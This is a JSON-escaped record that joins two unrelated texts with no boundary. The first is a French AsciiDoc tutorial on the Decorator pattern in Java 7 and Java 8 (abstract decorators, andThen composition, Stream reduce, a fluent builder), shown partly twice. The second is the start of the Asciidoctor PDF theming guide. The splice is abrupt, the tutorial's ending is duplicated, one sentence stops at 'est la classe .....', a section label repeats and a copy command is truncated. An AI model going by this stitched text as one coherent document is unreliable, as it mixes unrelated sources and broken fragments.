operators\".\nDe nouveau le client de l'API dispose d'un traitement tr\u00e8s souple, facilement modifiable et \u00e9volutif.\n\nUn exemple sans le decorator \"ExceptionalExpenses\" : \n\n[source,java]\n----\n@Test\n public void givenTurnover_whenNotComposingAllDecoratorsWithStream_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = StreamDecorator.INSTANCE.calculateProfit(turnover,\n new DefaultProfitCalculator(), Expenses::getOperatingExpenses, Expenses::getDeductibleTaxes,\n Expenses::getRemuneration);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(34600);\n }\n----\n\n\n== b) Decorator en Java 8 avec une API fluent\n\nDans cette derni\u00e8re partie, nous allons voir qu'il est possible d'impl\u00e9menter le decorator via une API fluent et permettant d'indiquer clairement au client de l'API les traitement effectu\u00e9s.\nL'objectif va \u00eatre de cr\u00e9er une classe Wrapper de type builder afin de composer nos fonctions de fa\u00e7on fluide.\n\nVoici le code complet de la classe appel\u00e9e FluentDecorator : \n\n[source,java]\n----\npublic final class FluentDecorator<T> {\n\n private final T value;\n private final Function<T, T> function;\n\n private FluentDecorator(final T value, Function<T, T> function) {\n this.value = value;\n this.function = function;\n }\n\n public static <T> FluentDecorator<T> from(final T value) {\n Objects.requireNonNull(value); \n return new FluentDecorator<>(value, Function.identity());\n }\n\n public FluentDecorator<T> with(final Function<T, T> otherFunction) {\n return new FluentDecorator<T>(this.value, function.andThen(otherFunction));\n }\n\n public T calculate() {\n return this.function.apply(value);\n }\n}\n----\n\nLe fluent decorator se base sur une valeur de type T (n'importe quel type via les Generics en Java) et enveloppe une Function<T,T>, c'est \u00e0 dire une fonction prenant un \u00e9l\u00e9ment de type T en entr\u00e9 en retournant un \u00e9lement de m\u00eame type (comme le DoubleUnaryOperator).\n\n[source,java]\n----\n private final T value;\n private final Function<T, T> function;\n----\n\nUn constructeur priv\u00e9 permet prend en param\u00e8tre les 2 \u00e9l\u00e9ments expliqu\u00e9s pr\u00e9c\u00e9demment (l'aspect priv\u00e9 permet d'empecher l'instantiation en dehors de la classe) : \n\n[source,java]\n----\nprivate FluentDecorator(final T value, Function<T, T> function) {\n this.value = value;\n this.function = function;\n}\n----\n\nUne static factory method est expos\u00e9 au client de l'API pour initialiser la classe avec un nom parlant. Cette m\u00e9thode s'appelle \"from\" et se base sur la valeur qui servira de base de calcul, dans notre cas le CA; \nUn contr\u00f4le est effectu\u00e9 sur la valeur afin de renvoyer une runtime exception si la valeur est nulle. Le constructeur de la classe est appel\u00e9 avec cette valeur et une fonction initiale vide (ainsi le param\u00e8tre global \"function\" de la classe ne sera pas nul et on \u00e9vitera des nullPointerException).\n\n[source,java]\n----\npublic static <T> FluentDecorator<T> from(final T value) {\n Objects.requireNonNull(value);\n return new FluentDecorator<>(value, Function.identity());\n}\n----\n\nLa composition des decorator se fait via la m\u00e9thode \"with\" qui prend en param\u00e8tre la fonction \u00e0 ajouter \u00e0 la composition g\u00e9n\u00e9rale. 
\nA final method executes the class's global function with the global value, \"function.apply(value)\". The result of the function is thus retrieved, in our case the computed profit:\n\n[source,java]\n----\npublic T calculate() {\n return this.function.apply(value);\n}\n----\n\nHere is the test code with all the decorators:\n\n[source,java]\n----\n @Test\n public void givenTurnover_whenComposingAllDecoratorsWithFluentStyle_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = FluentDecorator\n .from(turnover)\n .with(Expenses::getTransportExpenses)\n .with(Expenses::getOperatingExpenses)\n .with(Expenses::getDeductibleTaxes)\n .with(Expenses::getRemuneration)\n .with(Expenses::getExceptionalExpenses)\n .calculate();\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(32600);\n }\n----\n\nAnd the code without the \"ExceptionalExpenses\" decorator:\n\n[source,java]\n----\n@Test\n public void givenTurnover_whenNotComposingAllDecoratorsWithFluentStyle_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = FluentDecorator\n .from(turnover)\n .with(Expenses::getTransportExpenses)\n .with(Expenses::getOperatingExpenses)\n .with(Expenses::getDeductibleTaxes)\n .with(Expenses::getRemuneration).calculate();\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(34600);\n }\n----\n\n\n\n\n\n","old_contents":"= Pattern Decorator en Java 8\n:published_at: 2017-03-21\n:source-highlighter: highlightjs\n\n== 1) Introduction\n\nL'objectif de cette article est de parler d'un des pattern du GOF (gang of four) assez connu, qui est le decorator.\nCe patron de conception correspond \u00e0 un design pattern de type comportement (behavioural pattern).\n\nEn gros l'id\u00e9e de ce pattern est d'ajouter du comportement \u00e0 du code au runtime (c'est \u00e0 dire \u00e0 l'execution du code).\nCe pattern pr\u00e9sente de nombreux avantages car lorsque la conception a \u00e9t\u00e9 mise en place, il devient tr\u00e8s simple d'ajouter du comportement au code existant, ce qui le rend tr\u00e8s evolutif.\n\nAvant Java 8, malgr\u00e9 l'aspect interessant \u00e9voqu\u00e9 pr\u00e9c\u00e9dement, ce pattern n'\u00e9tait pas beaucoup utilis\u00e9 car le code n\u00e9cessaire \u00e0 sa mise en place \u00e9tait tr\u00e8s verbeux.\nEn effet le design de code \u00e9tait bas\u00e9 sur l'h\u00e9ritage, ce qui obligeait le d\u00e9veloppeur \u00e0 \u00e9crire une interface par d\u00e9corator, assez qu'une classe abstraite. 
La verbosit\u00e9 induite par ce type de d\u00e9v\u00e9loppement pouvait d\u00e9courager pas mal de d\u00e9veloppeurs.\n\nEn Java 8 avec l'apport des lambdas, nous allons montrer que le decorator est beaucoup plus simple \u00e0 impl\u00e9menter, moins verbeux, fonctionnel et plus lisible pour le client de l'API.\n\nL'article se d\u00e9compose en 2 partie consistant \u00e0 montrer le code et la conception du decorator avant et apr\u00e8s Java 8. En Java 8 nous montrerons diff\u00e9rentes techniques.\n\nL'exemple choisi pour illustrer ce pattern, est le calcul du b\u00e9n\u00e9fice d'une entreprise. Chaque nouveau decorator permettra d'ajouter un calcul au runtime \u00e0 la formule g\u00e9n\u00e9rale.\n\n== 2) Decorator en Java 7\n\nPremi\u00e8rement une interface d\u00e9finissant le contrat doit \u00eatre cr\u00e9\u00e9e, nous allons l'appeler ProfitCalculator (calculateur de b\u00e9n\u00e9fice). Voici le code de cette interface : \n\n[source,java]\n----\npublic interface ProfitCalculator {\n\n double calculate(double turnover);\n} \n----\n\nUn calculateur de profit dispose d'une m\u00e9thode abstraite \"calculate\", qui va appliquer un nouveau calcul au CA pass\u00e9 en param\u00e8tre.\n\nEnsuite il faut cr\u00e9er une classe abstraite que l'on va appeler AbstractProfitDecorator : \n\n[source,java]\n----\npublic abstract class AbstractProfitDecorator implements ProfitCalculator {\n\n private final ProfitCalculator profitCalculator;\n\n public AbstractProfitDecorator(ProfitCalculator profitCalculator) {\n this.profitCalculator = profitCalculator;\n }\n\n protected abstract double applyExpense(double turnover);\n\n @Override\n public double calculate(double turnover) {\n double profit = profitCalculator.calculate(turnover);\n return applyExpense(profit);\n }\n}\n----\n\nCette classe impl\u00e9mente l'interface pr\u00e9c\u00e9dente et doit donc proposer l'impl\u00e9mentation de la m\u00e9thode \"calculate(double turnover)\". \nChaque d\u00e9corator va appliquer une d\u00e9pense en proposant l'impl\u00e9mentation de la m\u00e9thode \"applyExpense(double turnover)\".\n\nUne subtilit\u00e9 est \u00e0 constater i\u00e7i, la classe prend \u00e9galement en param\u00e8tre l'interface \"ProfitCalculator\". \nEn effet, chaque decorator va appliquer le calcul du decorator qui le pr\u00e9c\u00e8de et va ensuite y ajouter son calcul \u00e0 lui. C'est ce comportement qui permet d'ajouter des traitements au runtime.\n\nNous allons commencer par une classe proposant un calcul par d\u00e9faut, appel\u00e9 \"DefaultProfitCalculator\". Il est en effet utile de commencer par une classe de type \"profitCalculator\" qui ne d\u00e9pend de rien lors de son instantiation. 
Ceci correspond au calcul initial des decorators : \n\n[source,java]\n----\npublic class DefaultProfitCalculator implements ProfitCalculator {\n\n @Override\n public double calculate(double turnover) {\n return Expenses.getTransportExpenses(turnover);\n }\n}\n----\n\nNous allons ensuite montrer le code des diff\u00e9rents decorators : \n\nCharges d'exploitation => OperatingExpensesDecorator : \n[source,java]\n----\npublic class OperatingExpensesDecorator extends AbstractProfitDecorator {\n\n public OperatingExpensesDecorator(ProfitCalculator profitCalculator) {\n super(profitCalculator);\n }\n\n @Override\n protected double applyExpense(double turnover) {\n return Expenses.getOperatingExpenses(turnover);\n }\n}\n----\n\nR\u00e9mun\u00e9ration => RemunerationDecorator : \n[source,java]\n----\npublic class RemunerationDecorator extends AbstractProfitDecorator {\n\n public RemunerationDecorator(ProfitCalculator profitCalculator) {\n super(profitCalculator);\n }\n\n @Override\n protected double applyExpense(double turnover) {\n return Expenses.getRemuneration(turnover);\n }\n}\n----\n\nD\u00e9penses exceptionnelles => ExceptionalExpensesDecorator : \n[source,java]\n----\npublic class ExceptionalExpensesDecorator extends AbstractProfitDecorator {\n\n public ExceptionalExpensesDecorator(ProfitCalculator profitCalculator) {\n super(profitCalculator);\n }\n\n @Override\n protected double applyExpense(double turnover) {\n return Expenses.getExceptionalExpenses(turnover);\n }\n}\n----\n\nTaxes d\u00e9ductible => DeductibleTaxesDecorator : \n[source,java]\n----\npublic class DeductibleTaxesDecorator extends AbstractProfitDecorator {\n\n public DeductibleTaxesDecorator(ProfitCalculator profitCalculator) {\n super(profitCalculator);\n }\n\n @Override\n protected double applyExpense(double turnover) {\n return Expenses.getDeductibleTaxes(turnover);\n }\n}\n----\n\nLe principe de chaque dcorator est le m\u00eame, chacun doit proposer une impl\u00e9mentation de la m\u00e9thide \"applyExpense\". Il est noter que les cas choisis ne refl\u00e8tent pas forcemment la r\u00e9alit\u00e9, mais servent juste d'exemple.\nUne \"garbage class\" appel\u00e9e Expenses contient des m\u00e9thodes statiques permettant de calculer chaque cas. Nous monterons cette classe un peu plus tard.\n\nNous allons d\u00e9sormais passer aux tests d'int\u00e9gration et \u00e0 l'appel des d\u00e9corators. \n\nLe premier test permet de composer tous les d\u00e9corators : \n\n[source,java]\n----\n@Test\n public void givenTurnover_whenComposingAllDecorators_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit =\n new ExceptionalExpensesDecorator(new RemunerationDecorator(new DeductibleTaxesDecorator(new OperatingExpensesDecorator(new DefaultProfitCalculator())))).calculate(turnover);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(32600);\n }\n----\n\nLe calcul commence de droite \u00e0 gauche, on commence par le DefaultProfitCalculator, enuite cette classe est pass\u00e9e en param\u00e8tre du d\u00e9corator OperatingExpensesDecorator et ainsi de suite.\nOperatingExpensesDecorator applique le calcul de DefaultProfitCalculator plus le sien.\n\nVoici un second test qui n'applique pas tous les d\u00e9corator, et montre qu'il est tr\u00e8s simple d'ajouter ou de supprimer un decorator au runtime. 
The code can thus evolve easily:

[source,java]
----
@Test
public void givenTurnover_whenNotComposingAllDecorators_thenCorrectResult() {

    // Given.
    final double turnover = 100000;

    // When.
    final double profit = new RemunerationDecorator(new DeductibleTaxesDecorator(new OperatingExpensesDecorator(new DefaultProfitCalculator()))).calculate(turnover);

    // Then.
    assertThat(profit).isNotNull().isEqualTo(34600);
}
----

From the point of view of the client of the API, this confirms that the pattern is attractive thanks to its flexibility: a new calculation (or, in another context, a new rule) can be added simply by creating a new decorator, without breaking the design already in place.

However, we can see that implementing this design pattern is very verbose. Many classes and many lines of code have to be written to put this kind of design in place.
Moreover, the fact that it is inheritance-oriented can make it hard to understand. All of these points can deter developers from adopting this kind of design.

One example of the use of this pattern in the JDK is the class .....

In the second part we will see how to redo the decorator pattern in Java 8 with lambdas and functions, and show that the code is much simpler and much less verbose.

== 3) Decorator in Java 8

Let's start by showing the static methods provided by the Expenses garbage class:

[source,java]
----
public class Expenses {

    public static double getTransportExpenses(final double turnover) {
        return turnover - 2400;
    }

    public static double getOperatingExpenses(final double turnover) {
        return turnover - 15000;
    }

    public static double getDeductibleTaxes(final double turnover) {
        return turnover - 3000;
    }

    public static double getRemuneration(final double turnover) {
        return turnover - 45000;
    }

    public static double getExceptionalExpenses(final double turnover) {
        return turnover - 2000;
    }
}
----

Each static method performs the desired calculation, taking a double as input and returning a double as output.
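These amounts also explain the expected values asserted in the integration tests above. Here is the arithmetic, step by step, as a sanity check:

[source,java]
----
// 100000 - 2400  (transport)        =  97600
//  97600 - 15000 (operating)        =  82600
//  82600 - 3000  (deductible taxes) =  79600
//  79600 - 45000 (remuneration)     =  34600  -> result without ExceptionalExpensesDecorator
//  34600 - 2000  (exceptional)      =  32600  -> result with all decorators composed
----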
Next, we will show different ways to implement this pattern in Java 8.

== a) Decorator in Java 8 with function composition

As in the Java 7 part, we write a class containing the default calculation:

[source,java]
----
public class DefaultProfitCalculator implements DoubleUnaryOperator {

    @Override
    public double applyAsDouble(final double operand) {
        return Expenses.getTransportExpenses(operand);
    }
}
----

This class implements DoubleUnaryOperator, a functional interface provided out of the box in JDK 8. This function takes a double as input and returns a double as output, which matches the signature of the calculations in the Expenses class. The applyAsDouble method is implemented with a default calculation.

And that's all...
We can now write our decorator in Java 8, via a test:

[source,java]
----
@Test
public void givenTurnover_whenComposingAllDecoratorsWithAndThen_thenCorrectResult() {

    // Given.
    final double turnover = 100000;

    // When.
    final double profit = new DefaultProfitCalculator()
        .andThen(Expenses::getOperatingExpenses)
        .andThen(Expenses::getDeductibleTaxes)
        .andThen(Expenses::getRemuneration)
        .andThen(Expenses::getExceptionalExpenses).applyAsDouble(turnover);

    // Then.
    assertThat(profit).isNotNull().isEqualTo(32600);
}
----

Isn't that great? We were able to rewrite the decorator pattern with very few lines of code.
JDK 8 makes it possible to compose several functions together via the "andThen" default method. This method is provided by the functional interfaces shipped with the JDK, and DoubleUnaryOperator is one of them.
We start from the DefaultProfitCalculator class and compose it with another function via andThen. In this example, method references were preferred in order to get more concise and expressive code ("Expenses::getOperatingExpenses"), but lambda expressions would have worked just as well ("e -> Expenses.getOperatingExpenses(e)").

It thus becomes very simple to add or remove decorators. In the example below, we remove the decorator representing the exceptional expenses:

[source,java]
----
@Test
public void givenTurnover_whenNotComposingAllDecoratorsWithAndThen_thenCorrectResult() {

    // Given.
    final double turnover = 100000;

    // When.
    final double profit = new DefaultProfitCalculator()
        .andThen(Expenses::getOperatingExpenses)
        .andThen(Expenses::getDeductibleTaxes)
        .andThen(Expenses::getRemuneration)
        .applyAsDouble(turnover);

    // Then.
    assertThat(profit).isNotNull().isEqualTo(34600);
}
----

In the following sections, we will look at other ways of implementing the decorator pattern in Java 8.

== b) Decorator in Java 8 with the Stream API

In this part, we will see that it is possible to implement the decorator pattern with the Stream API.
We create a class called StreamDecorator, implemented as a singleton enum (a single instance). This class contains a method called calculateProfit which is exposed to the client of the API:

[source,java]
----
public enum StreamDecorator {

    // Single instance.
    INSTANCE;

    public double calculateProfit(final double turnover, final DoubleUnaryOperator... operators) {
        return Stream.of(operators).reduce(DoubleUnaryOperator.identity(), DoubleUnaryOperator::andThen)
            .applyAsDouble(turnover);
    }
}
----

The idea here is to pass a sequence of functions represented by DoubleUnaryOperator instances (equivalent to an array of functions). The method also takes the turnover as a parameter.
The Stream API provides a factory method to create a Stream from an array. We then use the "reduce" method, which reduces the elements of the stream to a single value.

In functional programming, reduce corresponds to a "fold".
The principle is to pass two functions: an initial one (which is also the default value) and another that accumulates the elements. With this kind of operator it becomes very simple, for example, to compute the sum of the elements of a list.
For example:

[source,java]
----
reduce(0, (a, b) -> a + b)
----

In this example we consider a and b to be integers.
The initial value is 0. The accumulator "(a, b) -> a + b" sums the elements of the list as it goes along (it adds the result of the previous iteration to the element of the current iteration). If the structure is empty, the initial value is returned, that is to say 0.
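To make this concrete, here is a minimal, self-contained sketch of that sum example (the list and variable names are ours, just for illustration):

[source,java]
----
import java.util.Arrays;
import java.util.List;

public class ReduceExample {

    public static void main(String[] args) {
        List<Integer> numbers = Arrays.asList(1, 2, 3, 4);
        // Fold the stream into a single value: 0 + 1 + 2 + 3 + 4 = 10.
        int sum = numbers.stream().reduce(0, (a, b) -> a + b);
        System.out.println(sum); // prints 10
    }
}
----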
operators\".\nDe nouveau le client de l'API dispose d'un traitement tr\u00e8s souple, facilement modifiable et \u00e9volutif.\n\nUn exemple sans le decorator \"ExceptionalExpenses\" : \n\n[source,java]\n----\n@Test\n public void givenTurnover_whenNotComposingAllDecoratorsWithStream_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = StreamDecorator.INSTANCE.calculateProfit(turnover,\n new DefaultProfitCalculator(), Expenses::getOperatingExpenses, Expenses::getDeductibleTaxes,\n Expenses::getRemuneration);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(34600);\n }\n----\n\n\n== b) Decorator en Java 8 avec une API fluent\n\nDans cette derni\u00e8re partie, nous allons voir qu'il est possible d'impl\u00e9menter le decorator via une API fluent et permettant d'indiquer clairement au client de l'API les traitement effectu\u00e9s.\nL'objectif va \u00eatre de cr\u00e9er une classe Wrapper de type builder afin de composer nos fonctions de fa\u00e7on fluide.\n\nVoici le code complet de la classe appel\u00e9e FluentDecorator : \n\n[source,java]\n----\npublic final class FluentDecorator<T> {\n\n private final T value;\n private final Function<T, T> function;\n\n private FluentDecorator(final T value, Function<T, T> function) {\n this.value = value;\n this.function = function;\n }\n\n public static <T> FluentDecorator<T> from(final T value) {\n Objects.requireNonNull(value); \n return new FluentDecorator<>(value, Function.identity());\n }\n\n public FluentDecorator<T> with(final Function<T, T> otherFunction) {\n return new FluentDecorator<T>(this.value, function.andThen(otherFunction));\n }\n\n public T calculate() {\n return this.function.apply(value);\n }\n}\n----\n\nLe fluent decorator se base sur une valeur de type T (n'importe quel type via les Generics en Java) et enveloppe une Function<T,T>, c'est \u00e0 dire une fonction prenant un \u00e9l\u00e9ment de type T en entr\u00e9 en retournant un \u00e9lement de m\u00eame type (comme le DoubleUnaryOperator).\n\n[source,java]\n----\n private final T value;\n private final Function<T, T> function;\n----\n\nUn constructeur priv\u00e9 permet prend en param\u00e8tre les 2 \u00e9l\u00e9ments expliqu\u00e9s pr\u00e9c\u00e9demment (l'aspect priv\u00e9 permet d'empecher l'instantiation en dehors de la classe) : \n\n[source,java]\n----\nprivate FluentDecorator(final T value, Function<T, T> function) {\n this.value = value;\n this.function = function;\n}\n----\n\nUne static factory method est expos\u00e9 au client de l'API pour initialiser la classe avec un nom parlant. Cette m\u00e9thode s'appelle \"from\" et se base sur la valeur qui servira de base de calcul, dans notre cas le CA; \nUn contr\u00f4le est effectu\u00e9 sur la valeur afin de renvoyer une runtime exception si la valeur est nulle. Le constructeur de la classe est appel\u00e9 avec cette valeur et une fonction initiale vide (ainsi le param\u00e8tre global \"function\" de la classe ne sera pas nul et on \u00e9vitera des nullPointerException).\n\n[source,java]\n----\npublic static <T> FluentDecorator<T> from(final T value) {\n Objects.requireNonNull(value);\n return new FluentDecorator<>(value, Function.identity());\n}\n----\n\nLa composition des decorator se fait via la m\u00e9thode \"with\" qui prend en param\u00e8tre la fonction \u00e0 ajouter \u00e0 la composition g\u00e9n\u00e9rale. 
The class therefore holds these two fields:

[source,java]
----
    private final T value;
    private final Function<T, T> function;
----

A private constructor takes the two elements explained above as parameters (making it private prevents instantiation from outside the class):

[source,java]
----
private FluentDecorator(final T value, Function<T, T> function) {
    this.value = value;
    this.function = function;
}
----

A static factory method with a meaningful name is exposed to the client of the API to initialize the class. This method is called "from" and is based on the value that will serve as the basis of the calculation, in our case the turnover.
A check is performed on the value so that a runtime exception is thrown if it is null. The class constructor is called with this value and the identity function (this way the "function" field of the class is never null and we avoid NullPointerExceptions).

[source,java]
----
public static <T> FluentDecorator<T> from(final T value) {
    Objects.requireNonNull(value);
    return new FluentDecorator<>(value, Function.identity());
}
----

The decorators are composed via the "with" method, which takes as a parameter the function to add to the overall composition.
The goal is to call the class constructor again, but this time as follows:

[source,java]
----
new FluentDecorator<T>(this.value, function.andThen(otherFunction))
----

The "value" field of the class is passed along unchanged, and the class-level function is composed with "otherFunction" (via andThen). The result of this composition is passed back as a parameter to the FluentDecorator class.
Here is the code of the method:

[source,java]
----
public FluentDecorator<T> with(final Function<T, T> otherFunction) {
    return new FluentDecorator<T>(this.value, function.andThen(otherFunction));
}
----

When the "with" method is called, the processing is lazy, because at that point the function is not yet executed.

A final method executes the class-level function with the class-level value, "function.apply(value)". The result of the function is thus retrieved, in our case the profit calculation:

[source,java]
----
public T calculate() {
    return this.function.apply(value);
}
----
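The article stops here, before showing a client-side call. As a plausible usage sketch (our own, following the test conventions of the earlier sections and the arithmetic shown above), the fluent API could be exercised like this:

[source,java]
----
@Test
public void givenTurnover_whenComposingAllDecoratorsFluently_thenCorrectResult() {

    // Given.
    final double turnover = 100000;

    // When: compose lazily, then trigger the whole chain with calculate().
    final double profit = FluentDecorator.from(turnover)
        .with(Expenses::getTransportExpenses)
        .with(Expenses::getOperatingExpenses)
        .with(Expenses::getDeductibleTaxes)
        .with(Expenses::getRemuneration)
        .with(Expenses::getExceptionalExpenses)
        .calculate();

    // Then.
    assertThat(profit).isNotNull().isEqualTo(32600);
}
----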
= Asciidoctor PDF Theming Guide
Dan Allen <https://github.com/mojavelinux[@mojavelinux]>
// Settings:
:idprefix:
:idseparator: -
:toc: preamble
ifndef::env-github[:icons: font]
ifdef::env-github[]
:outfilesuffix: .adoc
:!toc-title:
:caution-caption: :fire:
:important-caption: :exclamation:
:note-caption: :paperclip:
:tip-caption: :bulb:
:warning-caption: :warning:
endif::[]
:window: _blank
// Aliases:
:conum-guard-yaml: #
ifndef::icons[:conum-guard-yaml: # #]
ifdef::backend-pdf[:conum-guard-yaml: # #]

////
Topics remaining to document:
* line height and line height length (and what that all means)
* title page layout / title page images (logo & background)
* document that unicode escape sequences can be used inside double-quoted strings
////

[.lead]
The theming system in Asciidoctor PDF is used to control the layout and styling of the PDF file Asciidoctor PDF generates from AsciiDoc.
This document describes how the theming system works, how to define a custom theme in YAML and how to activate the theme when running Asciidoctor PDF.

IMPORTANT: If you're creating a custom theme, you're expected to supply your own fonts.
We recognize this can be a major obstacle when you're starting out.
Therefore, your other option is to simply redeclare the fonts from the https://github.com/asciidoctor/asciidoctor-pdf/blob/master/data/themes/default-theme.yml[default theme] in the <<Custom Fonts,font catalog>>.
Asciidoctor PDF will then resolve the fonts that are bundled with the gem.

WARNING: If you don't declare your own fonts, the built-in (AFM) fonts declared in the https://github.com/asciidoctor/asciidoctor-pdf/blob/master/data/themes/base-theme.yml[base theme] will be used instead.
Using AFM fonts can result in missing functionality and warnings.
See the <<Built-In (AFM) Fonts>> section to learn more about these limitations.

toc::[]

== Language Overview

The theme language in Asciidoctor PDF is based on the http://en.wikipedia.org/wiki/YAML[YAML] data format and incorporates many concepts from CSS and SASS.
Therefore, if you have a background in web design, the theme language should be immediately familiar to you.

Like CSS, themes have both selectors and properties.
Selectors are the component you want to style.
The properties are the style elements of that component that can be styled.
All selector names are implicit (e.g., `heading`), so you customize the theme primarily by manipulating pre-defined property values (e.g., `font_size`).

[NOTE]
====
The theme language in Asciidoctor PDF supports a limited subset of the properties from CSS.
Some of these properties have different names from those found in CSS.

* Underscores (`_`) can be used in place of hyphens (`-`) for all property names in the theme language.
* Instead of separate properties for font weight and font style, the theme language combines these settings in the `font_style` property (allowed values: `normal`, `bold`, `italic` and `bold_italic`).
* The `text_align` property from CSS is the `align` property in the theme language.
* The `color` property from CSS is the `font_color` property in the theme language.
====

A theme (or style) is described in a YAML-based data format and stored in a dedicated theme file.
YAML is a human-friendly data format that resembles CSS and helps to describe the theme.
The theme language adds some extra features to YAML, such as variables, basic math, measurements and color values.
These enhancements will be explained in detail in later sections.

The theme file must be named _<name>-theme.yml_, where `<name>` is the name of the theme.

Here's an example of a basic theme file:

.basic-theme.yml
[source,yaml]
----
page:
  layout: portrait
  margin: [0.75in, 1in, 0.75in, 1in]
  size: Letter
base:
  font_color: #333333
  font_family: Times-Roman
  font_size: 12
  line_height_length: 17
  line_height: $base_line_height_length / $base_font_size
vertical_spacing: $base_line_height_length
heading:
  font_color: #262626
  font_size: 17
  font_style: bold
  line_height: 1.2
  margin_bottom: $vertical_spacing
link:
  font_color: #002FA7
outline_list:
  indent: $base_font_size * 1.5
----

When creating a new theme, you only have to define the keys you want to override from the base theme, which is loaded prior to loading your custom theme.
All the available keys are documented in <<Keys>>.
The converter uses the information from the theme map to help construct the PDF.

WARNING: If you start a new theme from scratch, we strongly recommend defining TrueType fonts and specifying them in the `base` and `literal` categories.
Otherwise, Asciidoctor PDF will use built-in AFM fonts, which can result in missing functionality and warnings.

[TIP]
====
Instead of creating a theme from scratch, another option is to download the https://github.com/asciidoctor/asciidoctor-pdf/blob/master/data/themes/default-theme.yml[default-theme.yml] file from the source repository.
Save the file using a unique name (e.g., _custom-theme.yml_) and start hacking on it.

Alternatively, you can snag the file from your local installation using the following command:
\"$ASCIIDOCTOR_PDF_DIR\/data\/themes\/default-theme.yml\" custom-theme.yml\n====\n\nKeys may be nested to an arbitrary depth to eliminate redundant prefixes (an approach inspired by SASS).\nOnce the theme is loaded, all keys are flattened into a single map of qualified keys.\nNesting is simply a shorthand way of organizing the keys.\nIn the end, a theme is just a map of key\/value pairs.\n\nNested keys are adjoined to their parent key with an underscore (`_`).\nThis means the selector part (e.g., `link`) is combined with the property name (e.g., `font_color`) into a single, qualified key (e.g., `link_font_color`).\n\nFor example, let's assume we want to set the base (i.e., global) font size and color.\nThese keys may be written longhand:\n\n[source,yaml]\n----\nbase_font_color: #333333\nbase_font_family: Times-Roman\nbase_font_size: 12\n----\n\nOr, to avoid having to type the prefix `base_` multiple times, the keys may be written hierarchically:\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n----\n\nOr even:\n\n[source,yaml]\n----\nbase:\n font:\n color: #333333\n family: Times-Roman\n size: 12\n----\n\nEach level of nesting must be indented by two more spaces of indentation than the parent level.\nAlso note the presence of the colon after each key name.\n\n== Values\n\nThe value of a key may be one of the following types:\n\n* String\n - Font family name (e.g., Roboto)\n - Font style (normal, bold, italic, bold_italic)\n - Alignment (left, center, right, justify)\n - Color as hex string (e.g., #ffffff)\n - Image path\n - Enumerated type (where specified)\n - Text content (where specified)\n* Null (clears any previously assigned value)\n - _empty_ (i.e., no value specified)\n - null\n - ~\n* Number (integer or float) with optional units (default unit is points)\n* Array\n - Color as RGB array (e.g., [51, 51, 51])\n - Color CMYK array (e.g., [50, 100, 0, 0])\n - Margin (e.g., [1in, 1in, 1in, 1in])\n - Padding (e.g., [1in, 1in, 1in, 1in])\n* Variable reference (e.g., $base_font_color)\n* Math expression\n\nNote that keys almost always require a value of a specific type, as documented in <<Keys>>.\n\n=== Inheritance\n\nLike CSS, inheritance is a principle feature in the Asciidoctor PDF theme language.\nFor many of the properties, if a key is not specified, the key inherits the value applied to the parent content in the content hierarchy.\nThis behavior saves you from having to specify properties unless you want to override the inherited value.\n\nThe following keys are inherited:\n\n* font_family\n* font_color\n* font_size\n* font_style\n* text_transform\n* line_height (currently some exceptions)\n* margin_bottom (if not specified, defaults to $vertical_spacing)\n\n.Heading Inheritance\n****\nHeadings inherit starting from a specific heading level (e.g., `heading_h2_font_size`), then to the heading category (e.g., `heading_font_size`), then directly to the base value (e.g., `base_font_size`).\nAny setting from an enclosing context, such as a sidebar, is skipped.\n****\n\n=== Variables\n\nTo save you from having to type the same value in your theme over and over, or to allow you to base one value on another, the theme language supports variables.\nVariables consist of the key name preceded by a dollar sign (`$`) (e.g., `$base_font_size`).\nAny qualified key that has already been defined can be referenced in the value of another key.\n(In order words, as soon as the key is assigned, it's available to be used as a variable).\n\nIMPORTANT: 
=== Variables

To save you from having to type the same value in your theme over and over, or to allow you to base one value on another, the theme language supports variables.
Variables consist of the key name preceded by a dollar sign (`$`) (e.g., `$base_font_size`).
Any qualified key that has already been defined can be referenced in the value of another key.
(In other words, as soon as the key is assigned, it's available to be used as a variable).

IMPORTANT: Variables are defined from top to bottom (i.e., in document order).
Therefore, a variable must be defined before it is referenced.
In other words, the path the variable refers to must be *above* the usage of that variable.

For example, once the following line is processed,

[source,yaml]
----
base:
  font_color: #333333
----

the variable `$base_font_color` will be available for use in subsequent lines and will resolve to `#333333`.

Let's say you want to make the font color of the sidebar title the same as the heading font color.
Just assign the value `$heading_font_color` to the `$sidebar_title_font_color`.

[source,yaml]
----
heading:
  font_color: #191919
sidebar:
  title:
    font_color: $heading_font_color
----

You can also use variables in math expressions to use one value to build another.
This is commonly done to set font sizes proportionally.
It also makes it easy to test different values very quickly.

[source,yaml]
----
base:
  font_size: 12
  font_size_large: $base_font_size * 1.25
  font_size_small: $base_font_size * 0.85
----

We'll cover more about math expressions later.

==== Custom Variables

You can define arbitrary key names to make custom variables.
This is one way to group reusable values at the top of your theme file.
If you are going to do this, it's recommended that you organize the keys under a custom namespace, such as `brand`.

For instance, here's how you can define your brand colors:

[source,yaml,subs=attributes+]
----
brand:
  primary: #E0162B {conum-guard-yaml} <1>
  secondary: '#FFFFFF' {conum-guard-yaml} <2>
  alert: '0052A5' {conum-guard-yaml} <3>
----
<1> To align with CSS, you may add a `+#+` in front of the hex color value.
A YAML preprocessor is used to ensure the value is not treated as a comment, as would normally be the case in YAML.
<2> You may put quotes around the CSS-style hex value to make it friendly to a YAML editor or validation tool.
<3> The leading `+#+` on a hex value is entirely optional.
However, we recommend that you always use either a leading `+#+` or surrounding quotes (or both) to prevent YAML from mangling the value.

You can now use these custom variables later in the theme file:

[source,yaml]
----
base:
  font_color: $brand_primary
----

=== Math Expressions & Functions

The theme language supports basic math operations to support calculated values.
